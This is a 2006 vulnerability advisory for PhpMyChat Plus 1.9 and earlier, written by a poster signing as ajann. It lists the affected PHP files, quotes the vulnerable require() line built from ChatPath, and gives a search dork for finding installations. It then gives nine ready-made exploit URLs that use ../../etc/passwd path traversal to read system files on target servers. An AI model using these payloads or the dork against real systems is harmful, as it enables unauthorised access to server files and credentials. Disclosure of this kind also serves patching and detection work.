PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities

2006-11-09T00:00:00
ID SECURITYVULNS:DOC:14977
Type securityvulns
Reporter Securityvulns
Modified 2006-11-09T00:00:00

Description

a*************

Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities

Author : ajann

Dork : phpMyChat plus

Vuln;


[Files] avatar.php colorhelp_popup.php color_popup.php index.php index1.php /lib/connected_users.lib.php /lib/index.lib.php logs.php phpMyChat.php3 [/Files]

[Code,1] connected_users.lib.php Error:

.. .... require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php"); require("./${ChatPath}/lib/clean.lib.php"); .... ..

Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] L=[file] Key [:] ChatPath=[file]

\Example:

http://target.com/path/avatar.php?ChatPath=../../etc/passwd http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd http://target.com/path/color_popup.php?ChatPath=../../etc/passwd http://target.com/path/index.php?ChatPath=../../etc/passwd http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd http://target.com/path/avatar.php?ChatPath=../../etc/passwd http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd http://target.com/path/logs.php?L=../../etc/passwd http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd

ajann,Turkey

...

Im not Hacker!